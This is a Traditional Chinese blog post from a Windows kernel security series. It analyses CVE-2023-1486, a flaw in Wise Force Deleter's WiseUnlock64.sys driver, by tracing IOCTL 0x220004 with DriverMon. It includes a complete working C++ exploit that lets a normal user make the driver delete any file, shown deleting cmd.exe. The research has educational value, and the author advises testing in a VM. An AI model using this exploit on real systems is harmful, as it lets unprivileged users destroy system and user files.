iT邦幫忙

2023 iThome 鐵人賽
DAY 16
2
Security

來自核心-烈日的 Windows系列 第 16

【第 16 話】CVE-2023-1486 研究-任意刪除檔案

15th鐵人賽
3389 瀏覽

  • 分享至 

  • xImage
    •  

文章大綱

這篇要研究 CVE-2023-1486 的漏洞成因,利用 DriverMon 觀察 IRP 的傳輸,藉此寫出攻擊腳本,達到任意刪除檔案。

介紹 CVE-2023-1486

首先來看看 CVE-2023-1486 在 MITRE 的描述。

A vulnerability classified as problematic was found in Lespeed WiseCleaner Wise Force Deleter 1.5.3.54. This vulnerability affects the function 0x220004 in the library WiseUnlock64.sys of the component IoControlCode Handler. The manipulation leads to improper access controls. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-223372.

直接用列點的方式抓重點。

  • 軟體:Lespeed WiseCleaner Wise Force Deleter 1.5.3.54
  • 元件:WiseUnlock64.sys
  • 漏洞位置:0x220004
  • 漏洞成因:Improper Access Controls

從我的 GitHub 下載 WiseUnlock64.sys。對驅動程式檔案點右鍵 => 內容 => 數位簽章,可以看到 WiseUnlock64.sys 的數位簽章資訊,是 2022 年 11 月 10 日的簽章。

https://ithelp.ithome.com.tw/upload/images/20230929/201293187j8h0AR12Z.png

DriverMon 觀察

從我的 GitHub 下載 WFDSetup_1.5.3.54.exe,在 VM 中安裝之後執行 Wise Force Deleter。

https://ithelp.ithome.com.tw/upload/images/20230929/20129318go239w7ule.png

這次我們不逆向分析驅動程式,而是用 zodiacon/DriverMon 觀察。由於 Windows 10 1709 沒更新的話,可能無法執行目前最新的版本,所以我是用 DriverMon 0.2-alpha

將 DriverMon 解壓縮到 VM 後執行,點選上方第二個按鈕。

https://ithelp.ithome.com.tw/upload/images/20230929/20129318pENrIzmFt6.png

DriverMon 會列舉所有已載入的驅動程式,選擇 WiseUnlock 後按 OK。最後按左上方的藍色三角形開始監控 IRP。

https://ithelp.ithome.com.tw/upload/images/20230929/20129318q7FOU6Zf9S.png

點選 Wise Force Deleter 的加入檔案,選一個正在被使用的檔案。下圖以 procexp64.exe 為例,也就是先執行 procexp64.exe 再從 Wise Force Deleter 選擇這個檔案。因為只有在檔案被開啟的狀況下,Wise Force Deleter 才會傳 IRP 給驅動程式強制刪除檔案。選擇檔案後點擊解除鎖定並刪除

https://ithelp.ithome.com.tw/upload/images/20230929/20129318c2BGA117qd.png

這時在 DriverMon 可以看到有一筆記錄跳出來,其中可以看到 Driver 名稱是 WiseUnlock、IoControlCode 0x220004、輸入長度 82 bytes、輸出長度 4 bytes。

https://ithelp.ithome.com.tw/upload/images/20230929/20129318BGYviwgDZt.png

點選 Data 欄位的 View 則可以看到輸入的內容就是刪除檔案的路徑。

https://ithelp.ithome.com.tw/upload/images/20230929/201293189Z8j7I3l9J.png

攻擊腳本

從 DriverMon 記錄的資訊已經足以讓我們寫出攻擊腳本,因此可以寫入檔案路徑給 WiseUnlock64.sys 強制刪除任意檔案。

  • Symbolic Link Name:WiseUnlock
  • IoControlCode:0x220004
  • 輸入:檔案路徑(寬字元)
  • 輸入長度:檔案路徑長度
  • 輸出長度:4

完整的專案也放在我的 GitHub zeze-zeze/2023iThome

#include <iostream>
#include <Windows.h>
#include <winioctl.h>

#define SymLinkName L"\\\\.\\WiseUnlock"

int main(int argc, char* argv[])
{
    HANDLE hDevice = CreateFile(SymLinkName, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_SYSTEM, 0);
    if (hDevice == INVALID_HANDLE_VALUE)
    {
        printf("Get Driver Handle Error with Win32 error code: %x\n", GetLastError());
        return 0;
    }

    // 寫入檔案路徑給 WiseUnlock64.sys 強制刪除任意檔案
    DWORD dwWrite;
    WCHAR data[] = L"\\??\\C:\\Windows\\System32\\cmd.exe";
    DeviceIoControl(hDevice, 0x220004, data, sizeof(data), data, 4, &dwWrite, NULL);

    CloseHandle(hDevice);
    return 0;
}

測試

在 VM 中安裝 WFDSetup_1.5.3.54.exe 或者直接載入 WiseUnlock64.sys 後用一般使用者執行 CVE-2023-1486.exe,你系統的 cmd 就會被刪除,就再也打不開命令提示字元了,所以務必在 VM 中測試

參考資料


上一篇
【第 15 話】簡單的 Kernel Fuzzer
下一篇
【第 17 話】從物理記憶體竄改 EPROCESS Token
系列文
來自核心-烈日的 Windows30
  1. 26
    【第 26 話】Kernel Callback 隱藏 Registry
  2. 27
    【第 27 話】Minifilter 保護檔案
  3. 28
    【第 28 話】Minifilter 隱藏檔案
  4. 29
    【第 29 話】WFP 監控流量
  5. 30
    【第 30 話】WFP 隱藏流量
完整目錄
圖片
  直播研討會
圖片
{{ item.channelVendor }} {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

尚未有邦友留言

立即登入留言
iThome鐵人賽
參賽組數
1064
團體組數
40
累計文章數
22083
完賽人數
594
iT+看影片追技術 看影片追技術 看更多
熱門tag 看更多
15th鐵人賽 16th鐵人賽 13th鐵人賽 14th鐵人賽 12th鐵人賽 11th鐵人賽 鐵人賽 2019鐵人賽 javascript 2018鐵人賽 python 2017鐵人賽 windows php c# windows server linux css react vue.js
熱門問題
熱門回答
熱門文章
IT邦幫忙